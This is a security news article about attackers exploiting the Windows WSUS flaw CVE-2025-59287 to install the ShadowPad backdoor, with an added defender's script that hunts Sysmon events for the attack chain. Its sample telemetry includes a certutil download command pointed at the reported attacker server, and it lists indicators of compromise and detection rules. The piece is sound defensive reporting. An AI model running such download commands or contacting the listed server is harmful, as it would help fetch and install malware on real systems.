ShadowPad Backdoor Delivered Through WSUS Exploit

A recently patched security flaw in Microsoft Windows Server Update Services (WSUS) is now being actively exploited by threat actors to deliver the modular backdoor known as ShadowPad.

“The attacker targeted Windows Servers with WSUS enabled, exploiting CVE-2025-59287 for initial access,” AhnLab Security Intelligence Center (ASEC) said in a report published last week. “They then used PowerCat, an open-source PowerShell-based Netcat utility, to obtain a system shell (CMD). Subsequently, they downloaded and installed ShadowPad using certutil and curl.”

ShadowPad, which researchers assess to be a successor to PlugX, is a modular backdoor widely used by Chinese state-sponsored hacking groups. It first emerged in 2015. In an analysis published in August 2021, SentinelOne called it a “masterpiece of privately sold malware in Chinese espionage.”

CVE-2025-59287, which Microsoft addressed last month, is a critical deserialization flaw in WSUS that can be exploited to achieve remote code execution with SYSTEM privileges. Only servers with the WSUS server role enabled are affected; WSUS listens on TCP 8530 (HTTP) and 8531 (HTTPS) by default, so any instance reachable from the internet on those ports is in scope.

Since the patch was released, attackers have increasingly used the vulnerability to gain initial access to publicly exposed WSUS instances, conduct reconnaissance, and even drop legitimate tools such as Velociraptor.


ShadowPad installed via CVE-2025-59287 exploit

In the attack documented by the South Korean cybersecurity company, the attackers weaponized the vulnerability to launch built-in Windows utilities such as “curl.exe” and “certutil.exe”, which contact an external server (“149.28.78[.]189:42306”) to download and install ShadowPad.

ShadowPad, like PlugX, is launched by means of DLL side-loading: a legitimate binary (“ETDCtrlHelper.exe”) is abused to execute a DLL payload (“ETDApix.dll”), which serves as a memory-resident loader that runs the backdoor.
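The chain above (WSUS worker process spawning a shell, certutil/curl fetching a payload from the reported address, then a side-loaded DLL) is exactly what a defender can hunt for in process-creation and image-load telemetry. The script below is an added example written for this page, not AhnLab's or TheHackerNews' code. It assumes Sysmon-style events (Event ID 1 for process creation, Event ID 7 for image load) represented as dictionaries, and that WSUS code executes under WsusService.exe or the IIS worker w3wp.exe; the sample events are constructed, and only the C2 address and the two side-loading file names come from the article.

```python
"""Hunt Sysmon-style events for the WSUS -> ShadowPad chain described above.

Added example, not code from the article or from AhnLab.
Assumptions (not from the article): WSUS runs under WsusService.exe and the
IIS worker w3wp.exe; events are dicts shaped like Sysmon EID 1 / EID 7.
"""
import re

WSUS_PARENTS = {"wsusservice.exe", "w3wp.exe"}       # assumed WSUS hosts
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DOWNLOADERS = {"certutil.exe", "curl.exe"}           # LOLBins named in the article
KNOWN_C2 = "149.28.78.189:42306"                     # article IOC, refanged
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
SIDELOAD_HOST = "etdctrlhelper.exe"                  # article: legitimate binary
SIDELOAD_DLL = "etdapix.dll"                         # article: loader DLL


def _base(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Return a list of finding strings for one event; empty means benign."""
    findings = []
    image = _base(ev["Image"])
    if ev["EventID"] == 1:                              # process creation
        parent = _base(ev["ParentImage"])
        cmd = ev.get("CommandLine", "")
        if parent in WSUS_PARENTS and image in SHELLS:
            findings.append(f"wsus-spawned-shell: {parent} -> {image}")
        url = URL_RE.search(cmd)
        if image in DOWNLOADERS and url:
            findings.append(f"lolbin-download: {image} {url.group(0)}")
        if KNOWN_C2 in cmd:
            findings.append("known-c2: " + KNOWN_C2)
    elif ev["EventID"] == 7:                            # image load
        loaded = _base(ev["ImageLoaded"])
        # A touchpad helper loading this DLL on a WSUS server is itself odd;
        # the host/DLL pair is the article's side-loading indicator.
        if image == SIDELOAD_HOST and loaded == SIDELOAD_DLL:
            findings.append(f"shadowpad-sideload: {image} loaded {loaded}")
    return findings


def hunt(events):
    """Run classify() over a stream and return (EventID, finding) pairs."""
    return [(ev["EventID"], f) for ev in events for f in classify(ev)]


# Constructed sample telemetry; not from any real incident.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": 'cmd.exe /c powershell -nop -w hidden -c "..."'},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "certutil -urlcache -split -f "
                    "http://149.28.78.189:42306/update.bin update.bin"},
    {"EventID": 1, "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
    {"EventID": 7, "Image": r"C:\ProgramData\Update\ETDCtrlHelper.exe",
     "ImageLoaded": r"C:\ProgramData\Update\ETDApix.dll"},
]

if __name__ == "__main__":
    for eid, finding in hunt(SAMPLE_EVENTS):
        print(f"EID {eid}: {finding}")
```

The parent-to-shell rule is the one worth keeping after this campaign is over: an IIS worker in the WsusPool has no business spawning cmd.exe or powershell.exe, whatever the payload, so it catches the next deserialization bug as well as this one. The IOC match is the narrowest rule and will age fastest.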

Once installed, the malware launches a core module that loads additional plugins embedded in the shellcode into memory. It also incorporates a variety of anti-detection and persistence techniques. The activity has not yet been attributed to any known threat actor or group.

“After the proof-of-concept (PoC) exploit code for the vulnerability was publicly released, attackers quickly weaponized it to distribute ShadowPad malware via WSUS servers,” AhnLab said. “This vulnerability is critical because it allows remote code execution with system-level permission, significantly increasing the potential impact.”

Source: TheHackerNews
